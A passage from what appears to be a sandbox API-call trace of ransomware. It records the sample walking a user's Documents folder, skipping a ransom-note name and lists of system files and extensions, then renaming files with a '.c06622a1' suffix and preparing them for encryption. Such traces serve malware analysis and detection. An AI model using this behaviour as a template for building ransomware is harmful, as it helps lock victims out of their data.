HALPmcxz\\Documents\\xgPWfuE3CiauL.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xgPWfuE3CiauL.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xgPWfuE3CiauL.pptx" [0157.994] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xgPWfuE3CiauL.pptx") returned 0x3e [0157.994] wcscpy (in: _Dest=0x32200cc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.994] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xgPWfuE3CiauL.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xgpwfue3ciaul.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xgPWfuE3CiauL.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xgpwfue3ciaul.pptx.c06622a1"), dwFlags=0x8) returned 1 [0157.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xgPWfuE3CiauL.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xgpwfue3ciaul.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0157.997] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.997] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0158.004] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7324c131 [0158.004] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1913d191 [0158.004] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x52e40596 [0158.004] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x59063d77 [0158.004] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3d8fad59 [0158.004] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb18ca51 [0158.004] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4caa5d1d [0158.004] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6db4d3a7 [0158.007] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0xbe6b4d82 [0158.007] RtlComputeCrc32 (PartialCrc=0x4d82, Buffer=0x35a0094, Length=0x80) returned 0xef9f868d [0158.007] RtlComputeCrc32 (PartialCrc=0x868d, Buffer=0x35a0094, Length=0x80) returned 0xf25c3ab5 [0158.007] RtlComputeCrc32 (PartialCrc=0x3ab5, Buffer=0x35a0094, Length=0x80) returned 0x2776222a [0158.007] RtlComputeCrc32 (PartialCrc=0x222a, Buffer=0x35a0094, Length=0x80) returned 0xf519774c [0158.007] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0158.007] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0158.008] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0158.009] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43135a90, ftCreationTime.dwHighDateTime=0x1d5e741, ftLastAccessTime.dwLowDateTime=0x11dbdf00, ftLastAccessTime.dwHighDateTime=0x1d5d8b5, ftLastWriteTime.dwLowDateTime=0x11dbdf00, ftLastWriteTime.dwHighDateTime=0x1d5d8b5, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x0, dwReserved1=0x0, cFileName="y-3kn.doc", cAlternateFileName="")) returned 1 [0158.010] _wcsicmp (_Str1="y-3kn.doc", _Str2="README.c06622a1.TXT") returned 7 [0158.010] wcsstr (_Str="y-3kn.doc", _SubStr="README") returned 0x0 [0158.010] _wcsicmp (_Str1="autorun.inf", _Str2="y-3kn.doc") returned -24 [0158.010] wcslen (_String="autorun.inf") returned 0xb [0158.010] _wcsicmp (_Str1="boot.ini", _Str2="y-3kn.doc") returned -23 [0158.010] wcslen (_String="boot.ini") returned 0x8 [0158.010] _wcsicmp (_Str1="bootfont.bin", _Str2="y-3kn.doc") returned -23 [0158.010] wcslen (_String="bootfont.bin") returned 0xc [0158.010] _wcsicmp (_Str1="bootsect.bak", _Str2="y-3kn.doc") returned -23 [0158.010] wcslen (_String="bootsect.bak") returned 0xc [0158.010] _wcsicmp (_Str1="desktop.ini", _Str2="y-3kn.doc") returned -21 [0158.010] wcslen (_String="desktop.ini") returned 0xb [0158.010] _wcsicmp (_Str1="iconcache.db", _Str2="y-3kn.doc") returned -16 [0158.010] wcslen (_String="iconcache.db") returned 0xc [0158.010] _wcsicmp (_Str1="ntldr", _Str2="y-3kn.doc") returned -11 [0158.010] wcslen (_String="ntldr") returned 0x5 [0158.010] _wcsicmp (_Str1="ntuser.dat", _Str2="y-3kn.doc") returned -11 [0158.010] wcslen (_String="ntuser.dat") returned 0xa [0158.010] _wcsicmp (_Str1="ntuser.dat.log", _Str2="y-3kn.doc") returned -11 [0158.010] wcslen (_String="ntuser.dat.log") returned 0xe [0158.010] _wcsicmp (_Str1="ntuser.ini", _Str2="y-3kn.doc") returned -11 [0158.010] wcslen (_String="ntuser.ini") returned 0xa [0158.010] _wcsicmp (_Str1="thumbs.db", _Str2="y-3kn.doc") returned -5 [0158.011] wcslen (_String="thumbs.db") returned 0x9 [0158.011] _wcsicmp (_Str1="386", _Str2="doc") returned -49 [0158.011] wcslen (_String="386") returned 0x3 [0158.011] _wcsicmp (_Str1="adv", _Str2="doc") returned -3 [0158.011] wcslen (_String="adv") returned 0x3 [0158.011] _wcsicmp (_Str1="ani", _Str2="doc") returned -3 [0158.011] wcslen (_String="ani") returned 0x3 [0158.011] _wcsicmp (_Str1="bat", _Str2="doc") returned -2 [0158.011] wcslen (_String="bat") returned 0x3 [0158.011] _wcsicmp (_Str1="bin", _Str2="doc") returned -2 [0158.011] wcslen (_String="bin") returned 0x3 [0158.011] _wcsicmp (_Str1="cab", _Str2="doc") returned -1 [0158.011] wcslen (_String="cab") returned 0x3 [0158.011] _wcsicmp (_Str1="cmd", _Str2="doc") returned -1 [0158.011] wcslen (_String="cmd") returned 0x3 [0158.011] _wcsicmp (_Str1="com", _Str2="doc") returned -1 [0158.011] wcslen (_String="com") returned 0x3 [0158.011] _wcsicmp (_Str1="cpl", _Str2="doc") returned -1 [0158.011] wcslen (_String="cpl") returned 0x3 [0158.011] _wcsicmp (_Str1="cur", _Str2="doc") returned -1 [0158.011] wcslen (_String="cur") returned 0x3 [0158.011] _wcsicmp (_Str1="deskthemepack", _Str2="doc") returned -10 [0158.011] wcslen (_String="deskthemepack") returned 0xd [0158.011] _wcsicmp (_Str1="diagcab", _Str2="doc") returned -6 [0158.011] wcslen (_String="diagcab") returned 0x7 [0158.011] _wcsicmp (_Str1="diagcfg", _Str2="doc") returned -6 [0158.012] wcslen (_String="diagcfg") returned 0x7 [0158.012] _wcsicmp (_Str1="diagpkg", _Str2="doc") returned -6 [0158.012] wcslen (_String="diagpkg") returned 0x7 [0158.012] _wcsicmp (_Str1="dll", _Str2="doc") returned -3 [0158.012] wcslen (_String="dll") returned 0x3 [0158.012] _wcsicmp (_Str1="drv", _Str2="doc") returned 3 [0158.012] wcslen (_String="drv") returned 0x3 [0158.012] _wcsicmp (_Str1="exe", _Str2="doc") returned 1 [0158.012] wcslen (_String="exe") returned 0x3 [0158.012] _wcsicmp (_Str1="hlp", _Str2="doc") returned 4 [0158.012] wcslen (_String="hlp") returned 0x3 [0158.012] _wcsicmp (_Str1="icl", _Str2="doc") returned 5 [0158.012] wcslen (_String="icl") returned 0x3 [0158.012] _wcsicmp (_Str1="icns", _Str2="doc") returned 5 [0158.012] wcslen (_String="icns") returned 0x4 [0158.012] _wcsicmp (_Str1="ico", _Str2="doc") returned 5 [0158.012] wcslen (_String="ico") returned 0x3 [0158.012] _wcsicmp (_Str1="ics", _Str2="doc") returned 5 [0158.012] wcslen (_String="ics") returned 0x3 [0158.012] _wcsicmp (_Str1="idx", _Str2="doc") returned 5 [0158.012] wcslen (_String="idx") returned 0x3 [0158.012] _wcsicmp (_Str1="ldf", _Str2="doc") returned 8 [0158.012] wcslen (_String="ldf") returned 0x3 [0158.012] _wcsicmp (_Str1="lnk", _Str2="doc") returned 8 [0158.012] wcslen (_String="lnk") returned 0x3 [0158.012] _wcsicmp (_Str1="mod", _Str2="doc") returned 9 [0158.012] wcslen (_String="mod") returned 0x3 [0158.012] _wcsicmp (_Str1="mpa", _Str2="doc") returned 9 [0158.012] wcslen (_String="mpa") returned 0x3 [0158.012] _wcsicmp (_Str1="msc", _Str2="doc") returned 9 [0158.012] wcslen (_String="msc") returned 0x3 [0158.012] _wcsicmp (_Str1="msp", _Str2="doc") returned 9 [0158.012] wcslen (_String="msp") returned 0x3 [0158.013] _wcsicmp (_Str1="msstyles", _Str2="doc") returned 9 [0158.013] wcslen (_String="msstyles") returned 0x8 [0158.013] _wcsicmp (_Str1="msu", _Str2="doc") returned 9 [0158.013] wcslen (_String="msu") returned 0x3 [0158.013] _wcsicmp (_Str1="nls", _Str2="doc") returned 10 [0158.013] wcslen (_String="nls") returned 0x3 [0158.013] _wcsicmp (_Str1="nomedia", _Str2="doc") returned 10 [0158.013] wcslen (_String="nomedia") returned 0x7 [0158.013] _wcsicmp (_Str1="ocx", _Str2="doc") returned 11 [0158.013] wcslen (_String="ocx") returned 0x3 [0158.013] _wcsicmp (_Str1="prf", _Str2="doc") returned 12 [0158.013] wcslen (_String="prf") returned 0x3 [0158.013] _wcsicmp (_Str1="ps1", _Str2="doc") returned 12 [0158.013] wcslen (_String="ps1") returned 0x3 [0158.013] _wcsicmp (_Str1="rom", _Str2="doc") returned 14 [0158.013] wcslen (_String="rom") returned 0x3 [0158.013] _wcsicmp (_Str1="rtp", _Str2="doc") returned 14 [0158.013] wcslen (_String="rtp") returned 0x3 [0158.013] _wcsicmp (_Str1="scr", _Str2="doc") returned 15 [0158.013] wcslen (_String="scr") returned 0x3 [0158.013] _wcsicmp (_Str1="shs", _Str2="doc") returned 15 [0158.013] wcslen (_String="shs") returned 0x3 [0158.013] _wcsicmp (_Str1="spl", _Str2="doc") returned 15 [0158.013] wcslen (_String="spl") returned 0x3 [0158.013] _wcsicmp (_Str1="sys", _Str2="doc") returned 15 [0158.013] wcslen (_String="sys") returned 0x3 [0158.013] _wcsicmp (_Str1="theme", _Str2="doc") returned 16 [0158.013] wcslen (_String="theme") returned 0x5 [0158.013] _wcsicmp (_Str1="themepack", _Str2="doc") returned 16 [0158.013] wcslen (_String="themepack") returned 0x9 [0158.013] _wcsicmp (_Str1="wpx", _Str2="doc") returned 19 [0158.013] wcslen (_String="wpx") returned 0x3 [0158.013] _wcsicmp (_Str1="lock", _Str2="doc") returned 8 [0158.013] wcslen (_String="lock") returned 0x4 [0158.014] _wcsicmp (_Str1="key", _Str2="doc") returned 7 [0158.014] wcslen (_String="key") returned 0x3 [0158.014] _wcsicmp (_Str1="hta", _Str2="doc") returned 4 [0158.014] wcslen (_String="hta") returned 0x3 [0158.014] _wcsicmp (_Str1="msi", _Str2="doc") returned 9 [0158.014] wcslen (_String="msi") returned 0x3 [0158.014] _wcsicmp (_Str1="pdb", _Str2="doc") returned 12 [0158.014] wcslen (_String="pdb") returned 0x3 [0158.014] _wcsicmp (_Str1="sqlite", _Str2="doc") returned 15 [0158.014] wcslen (_String="sqlite") returned 0x6 [0158.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0158.014] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0158.014] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0158.014] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0158.014] wcscpy (in: _Dest=0x32100a0, _Source="y-3kn.doc" | out: _Dest="y-3kn.doc") returned="y-3kn.doc" [0158.014] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y-3kn.doc", dwFileAttributes=0x80) returned 1 [0158.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y-3kn.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y-3kn.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0158.015] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.015] ReadFile (in: hFile=0x1a0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0158.016] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x842cb107 [0158.016] RtlComputeCrc32 (PartialCrc=0xb107, Buffer=0x32ec24, Length=0x80) returned 0x39ae83ec [0158.016] RtlComputeCrc32 (PartialCrc=0x83ec, Buffer=0x32ec24, Length=0x80) returned 0xcbac1392 [0158.016] RtlComputeCrc32 (PartialCrc=0x1392, Buffer=0x32ec24, Length=0x80) returned 0x54056c44 [0158.016] RtlComputeCrc32 (PartialCrc=0x6c44, Buffer=0x32ec24, Length=0x80) returned 0xde2ffcdb [0158.016] CloseHandle (hObject=0x1a0) returned 1 [0158.016] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0158.016] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y-3kn.doc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y-3kn.doc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y-3kn.doc" [0158.016] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y-3kn.doc") returned 0x35 [0158.016] wcscpy (in: _Dest=0x32200ba, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.016] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y-3kn.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y-3kn.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y-3kn.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y-3kn.doc.c06622a1"), dwFlags=0x8) returned 1 [0158.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y-3kn.doc.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y-3kn.doc.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0158.018] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.019] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3630020 [0158.027] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3b384c9a [0158.027] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f4b0e8a [0158.027] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5562eb08 [0158.027] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6fc9cb22 [0158.027] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x498207ae [0158.027] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3c9b438e [0158.027] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5afe6b6c [0158.027] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4620d2a0 [0158.031] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3630094, Length=0x80) returned 0xc33e0d16 [0158.031] RtlComputeCrc32 (PartialCrc=0xd16, Buffer=0x3630094, Length=0x80) returned 0xad24e0a0 [0158.031] RtlComputeCrc32 (PartialCrc=0xe0a0, Buffer=0x3630094, Length=0x80) returned 0x66e2e6db [0158.031] RtlComputeCrc32 (PartialCrc=0xe6db, Buffer=0x3630094, Length=0x80) returned 0xe369c8da [0158.031] RtlComputeCrc32 (PartialCrc=0xc8da, Buffer=0x3630094, Length=0x80) returned 0xf9215a49 [0158.031] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0158.031] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0158.032] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0158.033] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3ed580, ftCreationTime.dwHighDateTime=0x1d5a2c9, ftLastAccessTime.dwLowDateTime=0x75eee8d0, ftLastAccessTime.dwHighDateTime=0x1d56096, ftLastWriteTime.dwLowDateTime=0x75eee8d0, ftLastWriteTime.dwHighDateTime=0x1d56096, nFileSizeHigh=0x0, nFileSizeLow=0xab16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z4Usx4v.docx", cAlternateFileName="Z4USX4~1.DOC")) returned 1 [0158.033] _wcsicmp (_Str1="Z4Usx4v.docx", _Str2="README.c06622a1.TXT") returned 8 [0158.033] wcsstr (_Str="Z4Usx4v.docx", _SubStr="README") returned 0x0 [0158.033] _wcsicmp (_Str1="autorun.inf", _Str2="Z4Usx4v.docx") returned -25 [0158.033] wcslen (_String="autorun.inf") returned 0xb [0158.033] _wcsicmp (_Str1="boot.ini", _Str2="Z4Usx4v.docx") returned -24 [0158.033] wcslen (_String="boot.ini") returned 0x8 [0158.033] _wcsicmp (_Str1="bootfont.bin", _Str2="Z4Usx4v.docx") returned -24 [0158.033] wcslen (_String="bootfont.bin") returned 0xc [0158.033] _wcsicmp (_Str1="bootsect.bak", _Str2="Z4Usx4v.docx") returned -24 [0158.033] wcslen (_String="bootsect.bak") returned 0xc [0158.033] _wcsicmp (_Str1="desktop.ini", _Str2="Z4Usx4v.docx") returned -22 [0158.033] wcslen (_String="desktop.ini") returned 0xb [0158.033] _wcsicmp (_Str1="iconcache.db", _Str2="Z4Usx4v.docx") returned -17 [0158.033] wcslen (_String="iconcache.db") returned 0xc [0158.034] _wcsicmp (_Str1="ntldr", _Str2="Z4Usx4v.docx") returned -12 [0158.034] wcslen (_String="ntldr") returned 0x5 [0158.034] _wcsicmp (_Str1="ntuser.dat", _Str2="Z4Usx4v.docx") returned -12 [0158.034] wcslen (_String="ntuser.dat") returned 0xa [0158.034] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Z4Usx4v.docx") returned -12 [0158.034] wcslen (_String="ntuser.dat.log") returned 0xe [0158.034] _wcsicmp (_Str1="ntuser.ini", _Str2="Z4Usx4v.docx") returned -12 [0158.034] wcslen (_String="ntuser.ini") returned 0xa [0158.034] _wcsicmp (_Str1="thumbs.db", _Str2="Z4Usx4v.docx") returned -6 [0158.034] wcslen (_String="thumbs.db") returned 0x9 [0158.034] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0158.034] wcslen (_String="386") returned 0x3 [0158.034] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0158.034] wcslen (_String="adv") returned 0x3 [0158.034] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0158.034] wcslen (_String="ani") returned 0x3 [0158.034] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0158.034] wcslen (_String="bat") returned 0x3 [0158.034] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0158.035] wcslen (_String="bin") returned 0x3 [0158.035] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0158.035] wcslen (_String="cab") returned 0x3 [0158.035] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0158.035] wcslen (_String="cmd") returned 0x3 [0158.035] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0158.035] wcslen (_String="com") returned 0x3 [0158.035] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0158.035] wcslen (_String="cpl") returned 0x3 [0158.035] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0158.035] wcslen (_String="cur") returned 0x3 [0158.035] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0158.035] wcslen (_String="deskthemepack") returned 0xd [0158.035] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0158.035] wcslen (_String="diagcab") returned 0x7 [0158.035] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0158.035] wcslen (_String="diagcfg") returned 0x7 [0158.035] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0158.035] wcslen (_String="diagpkg") returned 0x7 [0158.035] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0158.035] wcslen (_String="dll") returned 0x3 [0158.035] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0158.035] wcslen (_String="drv") returned 0x3 [0158.035] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0158.035] wcslen (_String="exe") returned 0x3 [0158.035] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0158.035] wcslen (_String="hlp") returned 0x3 [0158.035] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0158.035] wcslen (_String="icl") returned 0x3 [0158.035] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0158.035] wcslen (_String="icns") returned 0x4 [0158.035] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0158.036] wcslen (_String="ico") returned 0x3 [0158.036] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0158.036] wcslen (_String="ics") returned 0x3 [0158.036] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0158.036] wcslen (_String="idx") returned 0x3 [0158.036] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0158.036] wcslen (_String="ldf") returned 0x3 [0158.036] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0158.036] wcslen (_String="lnk") returned 0x3 [0158.036] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0158.036] wcslen (_String="mod") returned 0x3 [0158.036] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0158.036] wcslen (_String="mpa") returned 0x3 [0158.036] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0158.036] wcslen (_String="msc") returned 0x3 [0158.036] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0158.036] wcslen (_String="msp") returned 0x3 [0158.036] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0158.036] wcslen (_String="msstyles") returned 0x8 [0158.036] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0158.036] wcslen (_String="msu") returned 0x3 [0158.036] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0158.036] wcslen (_String="nls") returned 0x3 [0158.036] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0158.036] wcslen (_String="nomedia") returned 0x7 [0158.036] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0158.036] wcslen (_String="ocx") returned 0x3 [0158.036] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0158.036] wcslen (_String="prf") returned 0x3 [0158.036] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0158.036] wcslen (_String="ps1") returned 0x3 [0158.036] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0158.037] wcslen (_String="rom") returned 0x3 [0158.037] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0158.037] wcslen (_String="rtp") returned 0x3 [0158.037] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0158.037] wcslen (_String="scr") returned 0x3 [0158.037] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0158.037] wcslen (_String="shs") returned 0x3 [0158.037] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0158.037] wcslen (_String="spl") returned 0x3 [0158.037] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0158.037] wcslen (_String="sys") returned 0x3 [0158.037] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0158.037] wcslen (_String="theme") returned 0x5 [0158.037] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0158.037] wcslen (_String="themepack") returned 0x9 [0158.037] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0158.037] wcslen (_String="wpx") returned 0x3 [0158.037] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0158.037] wcslen (_String="lock") returned 0x4 [0158.037] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0158.037] wcslen (_String="key") returned 0x3 [0158.037] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0158.037] wcslen (_String="hta") returned 0x3 [0158.037] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0158.037] wcslen (_String="msi") returned 0x3 [0158.037] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0158.037] wcslen (_String="pdb") returned 0x3 [0158.037] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0158.037] wcslen (_String="sqlite") returned 0x6 [0158.037] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0158.038] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0158.038] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0158.038] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0158.038] wcscpy (in: _Dest=0x32100a0, _Source="Z4Usx4v.docx" | out: _Dest="Z4Usx4v.docx") returned="Z4Usx4v.docx" [0158.038] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z4Usx4v.docx", dwFileAttributes=0x80) returned 1 [0158.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z4Usx4v.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z4usx4v.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0158.038] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.038] ReadFile (in: hFile=0x198, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0158.039] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xa22c5d24 [0158.039] RtlComputeCrc32 (PartialCrc=0x5d24, Buffer=0x32ec24, Length=0x80) returned 0x2e486e63 [0158.039] RtlComputeCrc32 (PartialCrc=0x6e63, Buffer=0x32ec24, Length=0x80) returned 0x29896691 [0158.039] RtlComputeCrc32 (PartialCrc=0x6691, Buffer=0x32ec24, Length=0x80) returned 0xc22a4c3b [0158.039] RtlComputeCrc32 (PartialCrc=0x4c3b, Buffer=0x32ec24, Length=0x80) returned 0xc5863371 [0158.039] CloseHandle (hObject=0x198) returned 